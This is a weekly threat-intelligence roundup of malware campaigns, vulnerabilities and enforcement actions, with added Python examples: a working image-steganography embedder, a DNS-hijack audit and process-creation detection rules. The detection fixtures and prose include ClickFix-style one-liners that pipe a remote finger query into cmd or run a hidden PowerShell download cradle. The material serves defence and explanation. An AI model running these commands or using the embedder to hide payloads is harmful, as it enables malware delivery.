Cyware Weekly Threat Intelligence, November 17–21, 2025

The Good
Authorities are taking aim at the backbone of the cybercriminal economy, from resilient server infrastructure to illicit financial flows. CISA has released a new guide to help network operators and defenders cut off bulletproof hosting services, which provide the safe havens that ransomware and malware operations depend on. Meanwhile, a Europol-led operation struck a major blow against digital piracy, identifying 69 suspect sites and disrupting $55 million in cryptocurrency linked to illegal streaming networks.
CISA released a new guide addressing the threat posed by bulletproof hosting (BPH) services, which are increasingly used by cybercriminals for ransomware, phishing, and malware distribution. Recommendations include identifying malicious resources, improving traffic visibility, applying targeted filters, and sharing threat intelligence across sectors. CISA emphasizes automated blocklist reviews, network-edge filters, and feedback processes to reduce accidental blocking of legitimate traffic. ISPs are encouraged to notify customers of threats, provide filtering tools, and establish standards to prevent BPH abuse.
A coordinated enforcement operation led by Europol, in collaboration with the European Union Intellectual Property Office and Spain’s National Police, targeted online intellectual property violations, resulting in the identification of 69 suspect sites and the disruption of $55 million in cryptocurrency linked to piracy. This initiative, known as Intellectual Property Crime Cyber-Patrol Week, utilized advanced open-source intelligence methods and involved over 30 investigators. By purchasing illegal services using cryptocurrency, authorities were able to trace transactions and disrupt revenue streams supporting criminal activities. The operation also facilitated international cooperation, with contributions from more than 15 countries, enhancing the collective response to the evolving challenges of digital piracy and illegal streaming services across Europe.
ENISA has achieved a significant milestone by becoming a CVE Root within the global CVE Program, enhancing its role in coordinating vulnerability management across Europe. This designation allows ENISA to assign CVE Identifiers and publish CVE Records for vulnerabilities reported to EU CSIRTs. The agency will also guide manufacturers on compliance with the Cyber Resilience Act and contribute to the European Vulnerability Database.
The Bad
The UNC2891 group has been caught running a sophisticated multi-year ATM fraud campaign targeting Indonesian banks. It physically implanted small single-board computers (Raspberry Pis) in ATM infrastructure and deployed the CAKETAP malware. An updated .NET loader is using steganography to conceal the Lokibot malware inside seemingly harmless image files to evade detection. Attackers are also digging deep into the computing history books for new weapons: the decades-old Finger protocol, originally for Unix systems, is now being exploited in ClickFix malware attacks.
Cybersecurity researchers have uncovered a multi-year ATM fraud campaign by the UNC2891 group, targeting two Indonesian banks through sophisticated methods. This operation involved recruiting money mules, creating cloned cards, and using Raspberry Pi devices to infiltrate ATMs. The group executed multiple attacks, employing advanced malware like CAKETAP to manipulate ATM transaction processes and bypass PIN verification. Persistent access was achieved via custom backdoors and various communication methods, including DNS tunneling. To cover their tracks, UNC2891 utilized anti-forensic tools to erase evidence and disguised their malware to evade detection.
In a sophisticated global malvertising effort known as TamperedChef, cybercriminals are exploiting fake software installers to deploy JavaScript malware that provides remote access to compromised systems. This campaign relies heavily on social engineering tactics, utilizing familiar application names and optimizing search engine results to lure unsuspecting users into downloading malicious software. The attackers enhance the credibility of their counterfeit applications by signing them with code-signing certificates obtained from shell companies. Once installed, the malware establishes a backdoor to gather machine metadata, potentially leading to advertising fraud or data theft. Sectors such as healthcare, construction, and manufacturing have been particularly hard-hit, with a notable concentration of infections in the U.S. Users searching for product manuals online are especially at risk.
An updated .NET steganography loader has emerged, using layered evasion techniques to deliver Lokibot malware. The loader disguises itself as a legitimate document and hides its malicious payload inside image files, with a module that decrypts and loads additional components at runtime, which complicates static detection. The Splunk Threat Research Team extracted the hidden payloads using their PixDig tool, revealing Lokibot, an information stealer targeting Windows and Android systems. Lokibot harvests sensitive data, including credentials and cryptocurrency wallets, using a range of techniques mapped to the MITRE ATT&CK framework: it manipulates access tokens for elevated privileges, injects itself into other processes to evade detection, and creates scheduled tasks for persistence.
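To make the steganography step concrete, here is an added example (not code from the page, from Splunk, or from the loader itself) of the simplest image-based hiding scheme: the payload is written one bit at a time into the least significant bit of each colour channel byte, so the pixel values change by at most 1 and the image looks unchanged. The carrier is a constructed 64x64 RGB buffer, the 4-byte "STEG" marker and the length-prefixed framing are assumptions for the example, and the "payload" is a constructed stand-in for a PE file, not real malware.

```python
"""Added example: LSB steganography embed/extract over a raw RGB pixel buffer.

Everything here is constructed for illustration; real loaders use their own
framing and usually encrypt the payload before embedding it.
"""
import random
import struct
from typing import Dict, Optional

MAGIC = b"STEG"  # hypothetical marker; chosen for this example only


def embed_lsb(pixels: bytearray, payload: bytes) -> bytearray:
    """Hide MAGIC + 4-byte little-endian length + payload in the LSB of each byte."""
    data = MAGIC + struct.pack("<I", len(payload)) + payload
    bits = "".join(f"{b:08b}" for b in data)
    if len(bits) > len(pixels):
        raise ValueError("carrier too small for payload")
    out = bytearray(pixels)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | int(bit)  # clear LSB, then set it to the payload bit
    return out


def _read_lsb_bytes(pixels: bytes, bit_offset: int, n: int) -> Optional[bytes]:
    """Reassemble n bytes from the LSBs starting at pixel index bit_offset."""
    chunk = pixels[bit_offset:bit_offset + n * 8]
    if len(chunk) < n * 8:
        return None
    return bytes(
        int("".join(str(p & 1) for p in chunk[i * 8:(i + 1) * 8]), 2) for i in range(n)
    )


def extract_lsb(pixels: bytes) -> Optional[bytes]:
    """Return the hidden payload if the marker is present, else None."""
    header = _read_lsb_bytes(pixels, 0, 8)
    if header is None or header[:4] != MAGIC:
        return None
    length = struct.unpack("<I", header[4:])[0]
    if length > (len(pixels) - 64) // 8:  # length field larger than carrier: bogus
        return None
    return _read_lsb_bytes(pixels, 64, length)


def looks_like_pe(blob: bytes) -> bool:
    """Cheap triage check: a Windows PE/.NET assembly starts with 'MZ'."""
    return blob[:2] == b"MZ"


def make_carrier(width: int = 64, height: int = 64, seed: int = 1) -> bytearray:
    """Constructed RGB pixel buffer standing in for a decoded image."""
    rng = random.Random(seed)
    return bytearray(rng.randrange(256) for _ in range(width * height * 3))


def demo() -> Dict[str, object]:
    """Embed a constructed 'MZ' payload, recover it, and measure the pixel change."""
    carrier = make_carrier()
    fake_pe = b"MZ" + bytes(range(256))  # constructed stand-in, not a real binary
    stego = embed_lsb(carrier, fake_pe)
    recovered = extract_lsb(stego)
    max_delta = max(abs(a - b) for a, b in zip(carrier, stego))
    return {"recovered": recovered, "pe": looks_like_pe(recovered or b""), "max_delta": max_delta}


if __name__ == "__main__":
    result = demo()
    print(result["pe"], result["max_delta"], len(result["recovered"]))
```

Extraction tools like PixDig do the same job in reverse, but without knowing the marker or framing in advance; the practical detection lever is therefore on the loader side, where a document-themed .NET executable that reads an image resource and calls into a dynamically loaded assembly is the observable behaviour.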
Fortinet has disclosed a medium-severity vulnerability in its FortiWeb product, tracked as CVE-2025-58034, which has already been exploited in the wild. The flaw, rated CVSS 6.7, allows an authenticated attacker to execute unauthorized operating system commands through specially crafted HTTP requests or CLI commands. Because exploitation requires prior authentication, an attacker needs valid credentials or another flaw that grants access before using this one to execute commands on the appliance. Fortinet has released patches for the affected FortiWeb versions and urges customers to update to the latest releases.
The decades-old Finger protocol, originally designed for retrieving user information on Unix and Linux systems, is being abused in ClickFix malware attacks to execute commands on Windows devices. Windows still ships a finger client, and its output is simply the text returned by the remote server, so a command such as finger user@attacker-host piped into cmd.exe runs whatever the attacker's Finger server sends back. Recent campaigns impersonate verification prompts to lure victims into running such commands, which retrieve scripts that download malware disguised as legitimate files and can lead to the installation of remote access tools like the NetSupport Manager RAT.
New Threats
China-linked APT24 hackers have been deploying a stealthy new malware called BadAudio in a massive espionage campaign. A new campaign is targeting Brazilian users with a WhatsApp worm that spreads the Eternidade Stealer. Once installed, it lies in wait for users to open banking or crypto apps to steal their sensitive financial data. A new phishing kit called Sneaky 2FA is using Browser-in-the-Browser technology to create realistic fake windows that trick users into handing over their Microsoft account details.
China-linked APT24 hackers have been using the previously undocumented BadAudio malware in a three-year espionage campaign targeting Windows systems. Since 2022, they have employed spearphishing, supply-chain compromises, and watering hole attacks to deliver the malware. APT24 compromised over 20 legitimate websites to inject malicious JavaScript, luring visitors into downloading BadAudio through fake software update prompts. They also compromised a digital marketing company in Taiwan and injected malicious code into widely used JavaScript libraries it served, affecting over 1,000 domains. The malware is heavily obfuscated and is loaded via DLL search order hijacking, so it runs under a legitimate signed host process. Once active, BadAudio collects system information and communicates with a C2 server to download further payloads.
A new Android banking trojan named Sturnus has been targeting encrypted messaging platforms such as Signal, WhatsApp, and Telegram. This malware is capable of capturing messages after they are decrypted, allowing attackers to access private conversations. Sturnus employs advanced encryption methods for communication with its C2 server and exploits Android's Accessibility services to monitor user activity in real time. Infection typically occurs through malicious APK files disguised as legitimate applications. Once installed, Sturnus gains extensive control over the device, including the ability to implement fake overlays that conceal its actions, such as transferring money or approving transactions.
A new campaign is targeting Brazilian users through a WhatsApp worm that distributes the Delphi-based banking trojan Eternidade Stealer. The worm uses a Python script to hijack the victim's WhatsApp account and send malicious attachments to their contacts. The infection chain begins with an obfuscated Visual Basic Script that drops a batch script, which in turn deploys the trojan. Eternidade Stealer scans for strings related to banking applications and cryptocurrency wallets and activates only when those apps are opened. Rather than relying on a hardcoded C2 address, it retrieves its current C2 server via an email-based lookup, giving it a resilient update and persistence channel, and it lets attackers record keystrokes, capture screenshots, and steal sensitive files.
PlushDaemon, a China-aligned cyber threat actor, has been using a new Go-based backdoor called EdgeStepper to conduct adversary-in-the-middle (AitM) attacks by hijacking DNS queries. This malware redirects legitimate software update traffic to malicious servers, enabling the deployment of harmful payloads like LittleDaemon, which subsequently downloads the more advanced SlowStepper backdoor. Active since at least 2018, PlushDaemon has targeted various sectors, including semiconductor, automotive, and electronics companies, across multiple countries including the U.S. and South Korea. SlowStepper is particularly versatile, capable of gathering system information, extracting credentials, and executing commands, making it a significant threat in global cyber espionage efforts.
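Hijacked DNS answers for update hosts are visible in resolver telemetry before any payload lands. The following is an added example (not code from the page, from ESET, or from any vendor) that audits constructed DNS log lines for three signs of the AitM pattern described above: an update host resolving outside the ranges the vendor publishes, clients using a resolver that is not the enterprise's, and the same update name resolving to different addresses across clients. The log format, the resolver address 10.0.0.53, the host update.example-vendor.test and the pinned 203.0.113.0/24 range are all assumptions for the example.

```python
"""Added example: audit DNS answers for update hosts against pinned ranges.

The log lines and pinned values below are constructed for illustration.
Line format assumed: <timestamp> <client> <resolver> <qname> <answer>
"""
import ipaddress
from collections import defaultdict
from typing import Dict, List

EXPECTED_RESOLVERS = {"10.0.0.53"}  # assumed enterprise resolver
PINNED = {  # assumed vendor-published ranges; in practice take these from the vendor or a baseline
    "update.example-vendor.test": [ipaddress.ip_network("203.0.113.0/24")],
}

# Constructed sample: two normal answers, one redirected answer, one query via a rogue resolver.
SAMPLE_LOG = """\
2025-11-18T09:01:12Z 10.0.5.21 10.0.0.53 update.example-vendor.test 203.0.113.10
2025-11-18T09:03:40Z 10.0.5.22 10.0.0.53 update.example-vendor.test 203.0.113.10
2025-11-18T09:05:02Z 10.0.5.23 10.0.0.53 update.example-vendor.test 198.51.100.77
2025-11-18T09:06:15Z 10.0.5.23 192.0.2.9 www.example.test 192.0.2.44
"""


def parse(log: str) -> List[Dict[str, object]]:
    """Split each line into a record; qnames are lowercased for comparison."""
    records = []
    for line in log.strip().splitlines():
        ts, client, resolver, qname, answer = line.split()
        records.append({
            "ts": ts, "client": client, "resolver": resolver,
            "qname": qname.lower().rstrip("."), "answer": ipaddress.ip_address(answer),
        })
    return records


def audit(records: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Return findings for unexpected resolvers, off-range answers and inconsistent answers."""
    findings = []
    answers_by_name = defaultdict(set)
    for r in records:
        answers_by_name[r["qname"]].add(r["answer"])
        if r["resolver"] not in EXPECTED_RESOLVERS:
            # EdgeStepper-style hijacking at the network edge shows up as answers
            # that did not come from the resolver the client was configured to use.
            findings.append({"kind": "unexpected_resolver", "client": r["client"],
                             "resolver": r["resolver"], "qname": r["qname"]})
        nets = PINNED.get(r["qname"])
        if nets and not any(r["answer"] in n for n in nets):
            findings.append({"kind": "answer_outside_pinned", "client": r["client"],
                             "qname": r["qname"], "answer": str(r["answer"])})
    for qname, answers in answers_by_name.items():
        if qname in PINNED and len(answers) > 1:
            findings.append({"kind": "inconsistent_answers", "qname": qname,
                             "answers": sorted(str(a) for a in answers)})
    return findings


if __name__ == "__main__":
    for f in audit(parse(SAMPLE_LOG)):
        print(f)
```

Treat the inconsistency rule with care: CDN-fronted update hosts legitimately return different addresses, so pin to vendor-published ranges or ASNs rather than single IPs. The durable fix is on the client side, where an update must be accepted only after its signature verifies, so a redirected download fails closed regardless of what DNS said.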
A new phishing kit known as Sneaky 2FA has added Browser-in-the-Browser (BitB) functionality to sharpen its attacks on Microsoft account credentials. The technique renders a fake pop-up window inside the page that mimics a legitimate login window, complete with a convincing address bar, so users enter their credentials without leaving the attacker's site. The operators gate the kit behind bot-protection measures such as CAPTCHA and Cloudflare Turnstile to filter out security scanners and reach only intended victims, and they use conditional loading and obfuscation to evade detection. Researchers also found that the same actors subvert passkey authentication flows through malicious browser extensions, allowing them to intercept and manipulate the login process.
Cybersecurity researchers have uncovered a new malware campaign known as EVALUSION, which utilizes the ClickFix social engineering tactic to distribute Amatera Stealer and NetSupport RAT. First identified in June, Amatera is an evolution of the ACR Stealer and is sold through subscription plans. This malware targets sensitive data from crypto-wallets, browsers, and messaging applications while employing sophisticated evasion techniques to bypass security measures. Victims are tricked into executing malicious commands via fake reCAPTCHA checks, leading to the download of a .NET payload. The Amatera DLL is injected into the "MSBuild.exe" process to harvest data and potentially deploy NetSupport RAT based on the victim's system attributes.
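Both the Finger-based ClickFix lures described under The Bad and the EVALUSION chain above end with the same observable: a user-launched shell running a download cradle, followed by a living-off-the-land binary doing something it should not. The following is an added example (not code from the page or from any of the cited research teams) of process-creation heuristics that cover both: a remote finger query piped into a shell, a shell started from the Run dialog (parent explorer.exe) with a download cradle on its command line, and MSBuild.exe started by a non-build parent with no project file. The events are constructed in a Sysmon Event ID 1-like shape; the paths, addresses and rule names are assumptions for the example.

```python
"""Added example: ClickFix and LOLBin heuristics over constructed process-creation events."""
import re
from typing import Dict, List, Tuple

# Constructed events; not real telemetry. Addresses are from documentation ranges.
EVENTS: List[Dict[str, str]] = [
    {"id": "e1", "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c finger.exe build@203.0.113.5 | cmd"},
    {"id": "e2", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden -c "iex (iwr http://203.0.113.7/check -UseBasicParsing)"'},
    {"id": "e3", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe", "cmdline": "MSBuild.exe"},
    {"id": "e4", "parent": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\src\app\app.csproj /t:Build"},
    {"id": "e5", "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir"},
    {"id": "e6", "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\finger.exe",
     "cmdline": "finger alice@203.0.113.9"},
]

# finger <user>@<host>: the client prints whatever the remote server returns.
FINGER_REMOTE = re.compile(r"\bfinger(?:\.exe)?\s+\S+@\S+", re.I)
PIPE_TO_SHELL = re.compile(r"\|\s*(?:cmd|powershell|pwsh)", re.I)
REDIRECT_SCRIPT = re.compile(r">\s*\S+\.(?:bat|cmd|ps1)\b", re.I)
# Common PowerShell/mshta download-and-execute fragments seen in ClickFix one-liners.
CRADLE = re.compile(
    r"\b(?:iex|invoke-expression|downloadstring|iwr|invoke-webrequest|curl\s|"
    r"mshta\s+https?://|frombase64string)", re.I)
USER_SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
PROJECT_FILE = re.compile(r"\.(?:proj|csproj|vbproj|sln)\b", re.I)
BUILD_PARENTS = {"devenv.exe", "dotnet.exe", "msbuild.exe"}


def basename(path: str) -> str:
    """Last path component, lowercased, for Windows-style paths."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (rule, severity) pairs that fire for one process-creation event."""
    hits = []
    img, par, cl = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
    if FINGER_REMOTE.search(cl):
        if PIPE_TO_SHELL.search(cl) or REDIRECT_SCRIPT.search(cl):
            hits.append(("finger_cradle", "high"))        # server output fed straight to a shell
        else:
            hits.append(("finger_remote_query", "low"))   # rare on modern Windows; worth a look
    if par == "explorer.exe" and img in USER_SHELLS and CRADLE.search(cl):
        hits.append(("run_dialog_download_cradle", "high"))  # classic ClickFix Win+R pattern
    if img == "msbuild.exe" and par not in BUILD_PARENTS and not PROJECT_FILE.search(cl):
        hits.append(("msbuild_without_project", "medium"))  # hollow MSBuild as an injection host
    return hits


def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Flatten hits across all events as (event_id, rule, severity)."""
    return [(ev["id"], rule, sev) for ev in events for rule, sev in classify(ev)]


if __name__ == "__main__":
    for hit in detect(EVENTS):
        print(*hit)
```

On developer workstations the MSBuild rule needs tuning (build scripts invoked from cmd.exe are normal), which is why it is rated medium and keyed on the absence of a project file rather than on the parent alone. The finger and Run-dialog rules have very low benign volume in most environments and are good candidates for high-fidelity alerts.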
Dragon Breath employs RONINGLOADER to deploy a modified Gh0st RAT, targeting Chinese-speaking users using trojanized NSIS installers. The malware utilizes advanced evasion techniques to disable endpoint security tools, including Microsoft Defender and Qihoo 360 Total Security. RONINGLOADER executes complex actions, such as tampering with system processes, injecting shellcode, and leveraging signed drivers to terminate security processes. The loader bypasses User Account Control (UAC) and manipulates firewall settings to block security software connections. Gh0st RAT enables remote control of infected systems, including registry modifications, event log clearing, keystroke capturing, and payload execution.